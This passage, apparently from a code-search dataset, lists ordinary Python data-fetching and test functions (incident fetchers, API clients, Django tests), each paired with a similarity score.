= self.fetch_time\n if not fetch_limit or not fetch_time:\n raise DemistoException('Missing parameter - fetch limit or fetch time')\n last_run = demisto.getLastRun()\n if last_run and last_run.get('timestamp'):\n timestamp = last_run.get('timestamp', '')\n last_fetched_ids = last_run.get('last_fetched_ids', [])\n else:\n if last_fetch := arg_to_datetime(fetch_time, required=True):\n # convert to ISO 8601 format and add Z suffix\n timestamp = last_fetch.strftime(DATE_FORMAT)\n last_fetched_ids = []\n\n page_size = '100'\n # set the until argument to prevent duplicates\n until = get_now_time()\n response = self.list_incidents_request(page_size, '0', until, timestamp)\n if not response.get('items'):\n return [], last_fetched_ids, timestamp\n\n page_number = response.get('totalPages', 1) - 1\n total = 0\n total_items: list[dict] = []\n while total < fetch_limit and page_number >= 0:\n try:\n response = self.list_incidents_request(page_size, page_number, until, timestamp)\n except HTTPError as e:\n if e.response is not None and e.response.status_code == 429:\n raise DemistoException(\n 'Too many requests, try later or reduce the number of Fetch Limit parameter.'\n ) from e\n raise e\n\n items = response.get('items', [])\n new_items = remove_duplicates_for_fetch(items, last_fetched_ids)\n # items order is from old to new , add new items at the start of list to maintain order\n total_items = new_items + total_items\n total += len(new_items)\n page_number -= 1\n\n # bring the last 'fetch_limit' items, as order is reversed\n total_items = total_items[len(total_items) - fetch_limit:]\n return total_items, last_fetched_ids, timestamp", "def fetch(prom_url, query_expr):\n\n global scrape_timestamp\n scrape_timestamp = int(datetime.now(tz=timezone.utc).timestamp() * 1000)\n\n response = requests.get(prom_url, params={ 'query': query_expr })\n results = response.json()['data']['result']\n\n return results", "def get_incidents_for_alert(**kwargs) -> list:\n incidents: List[Dict[str, Any]] = []\n\n headers = {\n 'X-FeApi-Token': kwargs['client'].get_api_token(),\n 'Accept': CONTENT_TYPE_JSON,\n }\n\n params = {\n 'start_time': time.strftime(\n API_SUPPORT_DATE_FORMAT, time.localtime(kwargs['start_time'])\n ),\n 
'duration': '48_hours',\n }\n\n if kwargs['malware_type']:\n params['malware_type'] = kwargs['malware_type']\n\n # http call\n resp = kwargs['client'].http_request(\n method='GET',\n url_suffix=URL_SUFFIX['GET_ALERTS'],\n params=params,\n headers=headers,\n )\n\n total_records = resp.get('alertsCount', 0)\n if total_records > 0:\n\n if kwargs['replace_alert_url']:\n replace_alert_url_key_domain_to_instance_url(\n resp.get('alert', []), kwargs['instance_url']\n )\n\n count = kwargs['fetch_count']\n for alert in resp.get('alert', []):\n # set incident\n context_alert = remove_empty_entities(alert)\n context_alert['incidentType'] = ALERT_INCIDENT_TYPE\n if count >= kwargs['fetch_limit']:\n break\n\n occurred_date = dateparser.parse(context_alert.get('occurred', ''))\n assert occurred_date is not None\n incident = {\n 'name': context_alert.get('name', ''),\n 'occurred': occurred_date.strftime(\n DATE_FORMAT_WITH_MICROSECOND\n ),\n 'rawJSON': json.dumps(context_alert),\n }\n\n if (\n not kwargs['is_test']\n and alert.get('uuid', '')\n and kwargs['fetch_artifacts']\n ):\n set_attachment_file(\n client=kwargs['client'],\n incident=incident,\n uuid=alert.get('uuid', ''),\n headers=headers,\n )\n\n remove_nulls_from_dictionary(incident)\n incidents.append(incident)\n count += 1\n return incidents", "def get_alarms(username, auth, url):\n f_url = url + \"/imcrs/fault/alarm?operatorName=\" + username + \\\n \"&recStatus=0&ackStatus=0&timeRange=0&size=50&desc=true\"\n response = requests.get(f_url, auth=auth, headers=HEADERS)\n try:\n if response.status_code == 200:\n alarm_list = (json.loads(response.text))\n return alarm_list['alarm']\n except requests.exceptions.RequestException as error:\n return \"Error:\\n\" + str(error) + ' get_alarms: An Error has occured'", "def get_episode_list(self):\n if self.episodes is not None:\n return self.episodes\n\n self.episodes = []\n\n # Now before we return pre-emptively fetch the episode list.\n # XXX We _could_ put this in a 'get_episode_list' method that does the\n # fetching then.. 
but for now we are just going to have it done\n # here.\n #\n if len(self.episode_guide_urls) == 0:\n return self.episodes\n\n for url in self.episode_guide_urls:\n url_data = url.get()\n\n # Now we run the GetEpisodeList rules on this data that\n # we just retrieved.\n #\n self.scraper.parser.set_buffer(1, url_data)\n self.scraper.parser.set_buffer(2, url.url)\n\n # This gets us a XML string with the list of episodes in it.\n # parse this in to a dom and then go through each <episode>\n # element creating an Episode object to append to our episode\n # list\n ep_list_result = self.scraper.parser.parse(FN_GET_EPISODE_LIST,\n self.scraper.settings)\n dom = parseString(ep_list_result)\n eps = dom.firstChild\n ep = first_child(eps, \"episode\")\n while ep:\n self.episodes.append(Episode(ep, self, self.scraper))\n ep = next_sibling(ep, \"episode\")\n dom.unlink()\n dom = None\n \n return self.episodes", "def get_prices(self):\n price = self.get_price()\n if price:\n return [price]\n return []", "def get(self, url_to_get=None): # pylint: disable=too-many-branches\n\n next_url = None\n if not url_to_get:\n url_to_get = self.url_to_get\n\n if self.etags and url_to_get in self.etags:\n self.headers[\"If-None-Match\"] = self.etags[url_to_get]\n\n req = get(url_to_get, headers=self.headers)\n\n if req.status_code == 200:\n data = req.json()\n repos = []\n\n if \"Etag\" in req.headers:\n self.etags[url_to_get] = req.headers[\"Etag\"]\n Helpers.Dict(self.etags).to_json(Settings.etags_file)\n\n if isinstance(data, list):\n repos.extend(data)\n else:\n raise Exception(\n \"Unable to understand GitHub API response for: '%s'.\" % url_to_get\n )\n\n if \"Link\" in req.headers:\n next_url = Helpers.Regex(\n req.headers[\"Link\"], self.regex_next_url, group=1, return_data=True\n ).match()\n\n if next_url:\n for element in self.get(url_to_get=next_url):\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n if repos:\n for element in repos:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n elif req.status_code == 304:\n data = Helpers.Dict.from_json(\n Helpers.File(Settings.repositories_file).read()\n )\n\n for element in data:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n elif req.status_code == 401:\n raise Exception(\"Bad GitHub credentials.\")\n else:\n raise Exception(\n \"Somethign went wrong while communicating with: '%s'.\" % url_to_get\n )", "def test_listar_expedientes_grado(self):\n self.assertNotEqual(self.almacen.listar_expedientes_grado(self.grado_valido), None)", "def get_exptimes( self ):\n return np.array([h['EXPTIME'] for h in self.headers])", "def retrieve_open_issues(self):\n return self._retrieve_issues(\"open\")", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def getEmployees(self):\n return self.employees", "def test_api_can_get_filtered_issues_list(self):\n path = '/issues/?language=python&tech_stack=django&experience_needed=moderate'\n response = self.client.get(path, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertGreater(len(api_response_issues), len(json.loads(response.content)))", "def get_prices(self):\n pass", "def 
get_leverables(self):\n import re\n\n \"\"\"\n Gets all groups (leverables) from nexus\n :return: list\n \"\"\"\n if self.url == 'test':\n leverabellist = ['asu', 'bll', 'tfp']\n else:\n leverabellist = []\n try:\n response = urlopen('http://' + self.url + '/nexus/content/repositories/rpm-dev/fk/rpm/')\n except (HTTPError, URLError) as e:\n logger.error(e)\n return ['Error getting leverables!!!']\n\n for rline in response:\n line = rline.decode(\"utf-8\")\n if re.match(\".*<td>(.*)/repositories/(.*)\", line):\n leverabellist.append(line.split('\">')[-1].split('/')[0])\n\n return leverabellist", "def _get_data_in_api(url: str) -> list:\n\n try:\n resp = requests.request('GET', url, timeout=10)\n resp.raise_for_status\n\n return Froxy._data_filter(resp.text)\n\n except (\n requests.ConnectionError,\n requests.ConnectTimeout,\n requests.HTTPError,\n requests.ReadTimeout\n ) as err:\n sys.exit(err)", "def fetch_instances(self, ids):\n result = []\n self.log.info(f\"fetch '{len(ids)}' instances\")\n self.log.debug(f\"fetch instance data for ids '{ids}'\")\n try:\n response = self.client.describe_instances(\n InstanceIds=ids\n )\n if 'HTTPStatusCode' in response['ResponseMetadata'] and response['ResponseMetadata']['HTTPStatusCode'] == 200:\n pass\n else:\n raise Exception(f'not able to fetch instacnes with ids: {ids}')\n if len(response['Reservations'][0]['Instances']) == 0:\n raise Exception(f'should retrun at least single insatance data')\n result = []\n for reservation in response[\"Reservations\"]:\n for el in reservation[\"Instances\"]:\n ec2 = EC2Instance.factory(el)\n if ec2.state:\n result.append(ec2)\n else:\n self.log.warn(f'instance \"{ec2.id}\" excluded')\n except Exception as e:\n raise Exception(f'exception when trying to fetch instance data {ids}')\n return sorted(list(result), key=lambda instance: instance.launch_time)", "def _get_images(self, fuzzable_request):\n res = []\n\n try:\n response = self._uri_opener.GET(fuzzable_request.get_uri(),\n cache=False)\n except:\n om.out.debug('Failed to retrieve the page for finding captchas.')\n else:\n # Do not use parser_cache here, it's not good since CAPTCHA implementations\n # *might* change the image name for each request of the HTML\n #dp = parser_cache.dpc.get_document_parser_for( response )\n try:\n document_parser = DocumentParser.DocumentParser(response)\n except BaseFrameworkException:\n return []\n \n image_path_list = document_parser.get_references_of_tag('img')\n\n GET = self._uri_opener.GET\n sha1 = hashlib.sha1\n \n result_iter = self.worker_pool.imap_unordered(GET, image_path_list)\n \n for image_response in result_iter:\n if image_response.is_image():\n img_src = image_response.get_uri()\n img_hash = sha1(image_response.get_body()).hexdigest()\n res.append((img_src, img_hash, response))\n\n return res", "def test_find_disputes(self):\n query_string = [('limit', 100),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('dispute_reason', DisputeCode()),\n ('dispute_status', DisputeStatus()),\n ('beginning_date', 'beginning_date_example'),\n ('ending_date', 'ending_date_example')]\n response = self.client.open(\n '/paySmart/ps-processadora/v1/disputes',\n method='GET',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def gethistory(itemID):\n\n return harvest(GET_HISTORIC_VALUE_URL, itemID)", "def get_exercises():\n email = session.get(\"email\")\n tag_arg = request.args.get(\"tag\")\n exercises = 
fm.get_all_exercises(email, tag_arg)\n msg = \"Found {} exercises for {}\".format(len(exercises), email)\n app.logger.info(msg)\n return jsonify(dict(exercises=exercises))", "def test_get_all_upcoming_expenses(self):\n print()\n print(\"Get all expenses will still occur\")\n user = CustomUser.objects.get(username = \"Test User\")\n actual_result = get_all_upcoming_budget_expenses(user = user)\n for ele in actual_result:\n print(ele)\n expected_result = [ BudgetExpense.objects.get(id=100),\n BudgetExpense.objects.get(id=150), \n BudgetExpense.objects.get(id=200), \n BudgetExpense.objects.get(id=600), \n BudgetExpense.objects.get(id=700),\n BudgetExpense.objects.get(id=500),\n BudgetExpense.objects.get(id=800)]\n print(\"====================\")\n print()\n self.assertEquals(expected_result, list(actual_result))" ]
[ "0.6731509", "0.6563917", "0.6551571", "0.63968503", "0.63752097", "0.5857632", "0.57382774", "0.5567012", "0.54315007", "0.54032236", "0.5390805", "0.53766435", "0.52719086", "0.52510387", "0.52280146", "0.52221656", "0.5203557", "0.5185477", "0.5180662", "0.5156471", "0.5141725", "0.5137997", "0.5133569", "0.51140064", "0.51082355", "0.5100608", "0.5095252", "0.5072092", "0.50504905", "0.49986422", "0.49618915", "0.49467337", "0.49392715", "0.49346536", "0.49121088", "0.49083567", "0.49002242", "0.49002242", "0.48952302", "0.4888357", "0.48876184", "0.48798832", "0.48549452", "0.48403662", "0.48354626", "0.4831559", "0.48279038", "0.48221853", "0.47903952", "0.4774124", "0.47710145", "0.47446805", "0.47429952", "0.47410995", "0.4738341", "0.47331548", "0.4726234", "0.4725938", "0.47174144", "0.47141108", "0.46995685", "0.46820635", "0.46765277", "0.46711636", "0.46690285", "0.46651393", "0.46568802", "0.46566218", "0.4649514", "0.46432486", "0.46365905", "0.46350834", "0.46262354", "0.46207651", "0.4615033", "0.46000478", "0.45980048", "0.45888168", "0.45876792", "0.4586843", "0.45861524", "0.4584878", "0.45802736", "0.4574077", "0.45716894", "0.45698923", "0.4568519", "0.45667434", "0.45637128", "0.45625764", "0.4557414", "0.4553826", "0.45350948", "0.4531048", "0.45252067", "0.45219463", "0.452079", "0.45204395", "0.45201847", "0.4516419" ]
0.7531671
0
fetcher.get_explores() should be able to filter on model and/or explore.
def test_get_explores_filters(fc: fetcher.Fetcher): explores = fc.get_explores(model="henry_dusty") assert all(e.model_name == "henry_dusty" for e in explores) explores = fc.get_explores(model="henry_qa", explore="explore_2_joins_all_used") assert all( e.model_name == "henry_qa" and e.name == "explore_2_joins_all_used" for e in explores )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def test_get_explores_throws_if_model_or_explore_does_not_exist(\n fc: fetcher.Fetcher, model: Optional[str], explore: Optional[str], msg: str\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_explores(model=model, explore=explore)\n assert msg in str(exc.value)", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def get_queryset(self):\n user = self.request.user\n expenses = Expense.objects.filter(\n Q(userexpense__in=user.userexpense_set.all())\n | Q(group__in=user.group_set.all()))\n\n if self.request.query_params.get('q', None) is not None:\n expenses = expenses.filter(\n description__icontains=self.request.query_params.get(\n 'q', None))\n return expenses", "def get_all_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_all()]", "def get_viewable_explorations(user_id):\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_viewable_explorations(user_id)]", "def refresh_index_page_filter_by(request, exposure_sequence):", "def explore_view(request):\r\n # explore items\r\n user = 
request.user.userprofile\r\n items = Item.objects.explore(user)\r\n context = {'items':items}\r\n return render(request, 'explore/explore.html', context)", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def get_list(self, resp):\n expenses = resp['expenses']\n expense_list = ExpenseList()\n for value in expenses:\n expense = Expense()\n expense.set_expense_id(value['expense_id'])\n expense.set_date(value['date'])\n expense.set_account_name(value['account_name'])\n expense.set_paid_through_account_name(value[\\\n 'paid_through_account_name'])\n expense.set_description(value['description'])\n expense.set_currency_id(value['currency_id'])\n expense.set_currency_code(value['currency_code'])\n expense.set_bcy_total(value['bcy_total'])\n expense.set_total(value['total'])\n expense.set_is_billable(value['is_billable'])\n expense.set_reference_number(value['reference_number'])\n expense.set_customer_id(value['customer_id'])\n expense.set_customer_name(value['customer_name'])\n expense.set_vendor_id(value['vendor_id'])\n expense.set_vendor_name(value['vendor_name'])\n expense.set_status(value['status'])\n expense.set_created_time(value['created_time'])\n expense.set_expense_receipt_name(value['expense_receipt_name'])\n expense_list.set_expenses(expense)\n page_context_obj = PageContext()\n page_context = resp['page_context']\n page_context_obj.set_page(page_context['page'])\n page_context_obj.set_per_page(page_context['per_page'])\n page_context_obj.set_has_more_page(page_context['has_more_page'])\n page_context_obj.set_report_name(page_context['report_name'])\n page_context_obj.set_applied_filter(page_context['applied_filter'])\n page_context_obj.set_sort_column(page_context['sort_column'])\n page_context_obj.set_sort_order(page_context['sort_order'])\n expense_list.set_page_context(page_context)\n\n return expense_list", "def get_queryset(self):\n #print(\"request\", self.request)\n user = self.request.user\n return Experience.objects.filter(person=user)", "def validate(self, mode: QueryMode = \"batch\") -> Dict[str, Any]:\n self._query_by_task_id = {}\n explore_count = self._count_explores()\n printer.print_header(\n f\"Testing {explore_count} \"\n f\"{'explore' if explore_count == 1 else 'explores'} \"\n f\"[{mode} mode] \"\n f\"[concurrency = {self.query_slots}]\"\n )\n\n self._create_and_run(mode)\n if mode == \"hybrid\" and self.project.errored:\n self._create_and_run(mode)\n\n for model in sorted(self.project.models, key=lambda x: x.name):\n for explore in sorted(model.explores, key=lambda x: x.name):\n message = f\"{model.name}.{explore.name}\"\n printer.print_validation_result(\n passed=not explore.errored, source=message\n )\n\n return self.project.get_results(mode)", "def get_images_by_vulnerability(self, **kwargs):\n ...", "def get_recommendations(artists = tuple(), genres = tuple(), limit = 20, features = True, client = None):\n\n recs = client.recommendations(seed_artists = artists, seed_genres = genres, limit = limit)\n tracks = recs['tracks']\n\n # TODO: need a compose function...\n to_keep = (\n 'album_name', 'artist_name', 'name', 'popularity', 'duration_ms',\n 'explicit', 'id'\n )\n rows = list(map(row_filter(to_keep, False), map(_hoist_track_info, tracks)))\n out = pd.DataFrame(rows)\n\n track_ids = [row['id'] for row in rows]\n if features:\n extra_cols = ['uri', 'type', 'duration_ms', 'analysis_url', 'track_href']\n return out.merge(\n 
get_track_features(track_ids).drop(columns = extra_cols),\n on = \"id\"\n )\n\n return out", "def get_public_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_public_explorations()]", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def related_view_filter():\n pass", "def get_recommendations(self):\n endpoints = '/user/recs'\n return self.get_request(endpoints)", "def test_get_scored_recommendations_post(self):\n pass", "def fetch_from_db(self):\n self._potential_deals = DBApi.get_instance().potential_records\n self._filters = DBApi.get_instance().filters\n # Add markdown for url\n for data in self._potential_deals:\n data[\"url\"] = f\"[Link]({data['url']})\"\n self._potential_deals_cols = self._db_api.get_potential_deal_columns()\n self._years = self._db_api.get_unique_years(self._potential_deals)\n self._make_model = self._db_api.get_all_make_models()\n self._action_options = [\"Action1\", \"Action2\", \"Action3\"]", "def list_extractors(age_limit=None):\n return [ie() for ie in list_extractor_classes(age_limit)]", "def get_queryset(self):\n\n user = get_authentication(self.request)\n queryset = Histories.objects.filter(user=user, is_used=True)\n\n return queryset", "def index( self, trans, **kwd ):\n # Example URL: http://localhost:9009/api/repository_revisions\n repository_metadata_dicts = []\n # Build up an anded clause list of filters.\n clause_list = []\n # Filter by downloadable if received.\n downloadable = kwd.get( 'downloadable', None )\n if downloadable is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.downloadable == util.string_as_bool( downloadable ) )\n # Filter by malicious if received.\n malicious = kwd.get( 'malicious', None )\n if malicious is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.malicious == util.string_as_bool( malicious ) )\n # Filter by tools_functionally_correct if received.\n tools_functionally_correct = kwd.get( 'tools_functionally_correct', None )\n if tools_functionally_correct is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.tools_functionally_correct == util.string_as_bool( tools_functionally_correct ) )\n # Filter by missing_test_components if received.\n missing_test_components = kwd.get( 'missing_test_components', None )\n if missing_test_components is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.missing_test_components == util.string_as_bool( missing_test_components ) )\n # Filter by do_not_test if received.\n do_not_test = kwd.get( 'do_not_test', None )\n if do_not_test is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.do_not_test == util.string_as_bool( do_not_test ) )\n # Filter by includes_tools if received.\n includes_tools = kwd.get( 'includes_tools', None )\n if includes_tools is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.includes_tools == util.string_as_bool( includes_tools ) )\n # Filter by test_install_error if received.\n test_install_error = kwd.get( 'test_install_error', None )\n if test_install_error is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.test_install_error == util.string_as_bool( test_install_error ) )\n # Filter by skip_tool_test if received.\n skip_tool_test = kwd.get( 'skip_tool_test', None )\n if skip_tool_test is not 
None:\n skip_tool_test = util.string_as_bool( skip_tool_test )\n skipped_metadata_ids_subquery = select( [ trans.app.model.SkipToolTest.table.c.repository_metadata_id ] )\n if skip_tool_test:\n clause_list.append( trans.model.RepositoryMetadata.id.in_( skipped_metadata_ids_subquery ) )\n else:\n clause_list.append( not_( trans.model.RepositoryMetadata.id.in_( skipped_metadata_ids_subquery ) ) )\n # Generate and execute the query.\n try:\n query = trans.sa_session.query( trans.app.model.RepositoryMetadata ) \\\n .filter( and_( *clause_list ) ) \\\n .order_by( trans.app.model.RepositoryMetadata.table.c.repository_id ) \\\n .all()\n for repository_metadata in query:\n repository_metadata_dict = repository_metadata.get_api_value( view='collection',\n value_mapper=default_value_mapper( trans, repository_metadata ) )\n repository_metadata_dict[ 'url' ] = web.url_for( controller='repository_revisions',\n action='show',\n id=trans.security.encode_id( repository_metadata.id ) )\n repository_metadata_dicts.append( repository_metadata_dict )\n return repository_metadata_dicts\n except Exception, e:\n message = \"Error in the Tool Shed repository_revisions API in index: \" + str( e )\n log.error( message, exc_info=True )\n trans.response.status = 500\n return message", "def test_api_can_get_all_expenses(self):\n self.register_user()\n result = self.login_user()\n access_token = json.loads(result.data.decode())['access_token']\n res = self.client().post('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token), data=self.expense)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token))\n self.assertEqual(res.status_code, 200)\n results = json.loads(res.data)\n self.assertEqual(results['items'][0]['name'], self.expense['name'])", "def explores(self, explores):\n\n self._explores = explores", "def expense_history(request):\n qs: QuerySet = Expense.objects.by_user(request.user.id)\n file_title: str = \"Latest_150_Expenses\"\n form = ExpenseHistory(request.GET)\n if form.is_valid():\n cd: dict = form.cleaned_data\n target: str = cd[\"target\"]\n user_id = request.user.id\n if target == \"date\":\n qs = Expense.objects.filter(date=cd[\"date1\"], user_id=user_id)\n file_title = f'For_{cd[\"date1\"]}'\n elif target == \"each_month\":\n qs = Expense.objects.filter(date__month=cd[\"month\"], user_id=user_id)\n file_title = f\"Every_{calendar.month_name[cd['month']]}_Month\"\n elif target == \"months\":\n qs = Expense.objects.last_n_months_expense(cd[\"p_months\"], user_id)\n file_title = f\"Last_{cd['p_months']}_months\"\n elif target == \"month\":\n qs = Expense.objects.month_expense(cd[\"month\"], cd[\"year\"], user_id)\n file_title = f'For_{calendar.month_name[cd[\"month\"]]}-{cd[\"year\"]}'\n elif target == \"year\":\n qs = Expense.objects.year_expense(cd[\"year\"], user_id)\n file_title = f\"{cd['year']}\"\n elif target == \"between\":\n qs = Expense.objects.filter(date__gte=cd[\"date1\"], date__lte=cd[\"date2\"],\n user__id=user_id)\n file_title = f'Between_{cd[\"date1\"]}_{cd[\"date2\"]}'\n qs = qs.order_by(\"-date\", \"-id\").values_list(\n \"date\", \"description\", \"category__name\", \"method\", \"app\", \"amount\",\n )\n if not form.is_valid():\n qs = qs[:150]\n qs_list = []\n if qs:\n for q in qs:\n qs_list.append([\n q[0], q[1], q[2], METHOD_DICT[q[3]], APP_DICT.get(q[4], \"Other\"), q[5]\n ])\n file_title = f\"{date.today()}_\" + file_title\n return render(request, \"tracker/history.html\",\n {\"qs\": 
qs_list, \"file_title\": file_title, \"form\": form})", "def test_view_telescope(self):\n telescope_name = 'super_big_telescope'\n instrument_name = 'awesome_instrument'\n create_exposures(telescope_name, instrument_name, 2012, 6, 1)\n create_exposures(telescope_name, instrument_name, 2013, 7, 1)\n expected_exposures = [\n '<Exposure: %s 2012/06/01 run 1>' % telescope_name,\n '<Exposure: %s 2012/06/01 run 2>' % telescope_name,\n '<Exposure: %s 2013/07/01 run 1>' % telescope_name,\n '<Exposure: %s 2013/07/01 run 2>' % telescope_name,\n ]\n response = self.client.get(reverse(\n 'observations:telescope', args=('super_big_telescope',)))\n self.assertQuerysetEqual(response.context['exposure_list'], \n expected_exposures)", "def filter_(cls, exp):\n rsc_filter = config.get('exp_filter', 'rsc_filter')\n if rsc_filter.lower() == 'all':\n return True\n if rsc_filter.lower() == exp.exp_info['faulty_resource'].lower():\n return True\n return False", "def check_for_exposed(context):\n json_data = context.response.json()\n if \"exploitable_vulnerabilities_count\" in json_data:\n raise Exception(\"Field exploitable_vulnerabilities_count Exposed in\"\n \" Free user result\")\n if \"vendor_package_link\" in json_data:\n raise Exception(\"Field vendor_package_link has been exposed for free user\")", "def _create_explore_query(self, explore: Explore, model_name: str) -> Query:\n dimensions = [dimension.name for dimension in explore.dimensions]\n query = self.client.create_query(model_name, explore.name, dimensions)\n return Query(query[\"id\"], lookml_ref=explore, explore_url=query[\"share_url\"])", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def _explore(self, explore_iterable):\n if self.v_locked:\n raise pex.ParameterLockedException(\n \"Parameter `%s` is locked!\" % self.v_full_name\n )\n\n if self.f_has_range():\n raise TypeError(\n \"Your parameter `%s` is already explored, \"\n \"cannot _explore it further!\" % self._name\n )\n\n if self._data is None:\n raise TypeError(\n \"Your parameter `%s` has no default value, please specify one \"\n \"via `f_set` before exploration. 
\" % self.v_full_name\n )\n\n data_list = self._data_sanity_checks(explore_iterable)\n\n self._explored_range = data_list\n self._explored = True\n self.f_lock()", "def view_experiment(request,id):\n\texp = Experiment.objects.get(id=id)\n\tpossibly_related = get_related(exp)\n\treturn list_detail.object_detail(request,\n\t\t\t\t\t\t\t\t\tqueryset=Experiment.objects.filter(id=id),\n\t\t\t\t\t\t\t\t\tobject_id=exp.id,\n\t\t\t\t\t\t\t\t\ttemplate_name='experiments/experiment.html',\n\t\t\t\t\t\t\t\t\textra_context= {\"possibly_related\" : possibly_related})", "def explore(self, *args):", "def search_expansions_by_game(owner, title):\n uuid = search_uuid(owner, title)\n if uuid:\n condition = \"owner LIKE \\'%\" + owner + \"%\\' AND basegame_uuid=\\'\" + uuid + \"\\'\"\n result = select_columns(choose_database(\"datadb\"), 'expansions', \"*\", condition=condition)\n if not result: # no expansions\n return None\n return result\n return False", "def sel_exp_query(\n experiment_name,\n model,\n # db_config,\n credentials,\n cluster=False):\n perfs = None\n proc_model_name = '%%/%s' % model\n with allen_db(\n # config=db_config,\n cluster=cluster,\n credentials=credentials) as db_conn:\n perfs = db_conn.get_performance_by_model(\n experiment_name=experiment_name,\n model=proc_model_name)\n return perfs", "def experiment_search(request):\n\texp_types = [e[0] for e in set(Experiment.objects.values_list('type'))]\n\tif request.GET:\n\t\tq = Q(name__startswith=request.GET['name__startswith'])\n\t\tq = q & Q(origdir__icontains=request.GET['origdir__icontains'])\n\t\tif not request.GET['type'] == '':\n\t\t\tq = q & Q(type__exact=request.GET['type'])\n\t\texperiments = Experiment.objects.filter(q)\n\t\treturn list_detail.object_list(request,\n\t\t\t\t\t\t\t\t\t\t paginate_by=20,\n\t\t\t\t\t\t\t\t\t\t queryset=experiments.order_by('name'),\n\t\t\t\t\t\t\t\t\t\t template_name='experiments/experiment_list.html',\n\t\t\t\t\t\t\t\t\t\t extra_context={'user':request.user})\n\telse:\n\t\treturn render_to_response('experiments/experiment_search.html',\n\t\t\t\t\t\t\t\t{'exp_types':exp_types},\n\t\t\t\t\t\t\t\tcontext_instance=RequestContext(request))", "def test_index(populate_malware, authenticated_client):\n names = [malware.name for malware in populate_malware]\n for name in names:\n query_json = {'name': name}\n rv = authenticated_client.post('/api/entities/filter/',\n data=json.dumps(query_json),\n content_type='application/json')\n response = json.loads(rv.data)\n for item in response:\n assert item['id'].startswith('malware--')\n assert len(item['labels']) >= 1", "def _filter_entries_by_url(self, url, har):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n for entry in har[\"log\"][\"entries\"]:\r\n if url in entry[\"request\"][\"url\"]:\r\n matches.append(entry)\r\n return matches", "def expenses(self):\n\n return Expenses.objects.filter(\n house=self.house,\n )", "def _filter_entries_by_response(self, urls, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n if len(har[\"log\"][\"entries\"]) > 1:\r\n for entry in har[\"log\"][\"entries\"]:\r\n for url in urls:\r\n if url in entry[\"request\"][\"url\"]:\r\n tempObject = {}\r\n if entry[\"response\"][\"status\"] == 200 and entry[\"response\"][\"content\"].get(\"text\") and 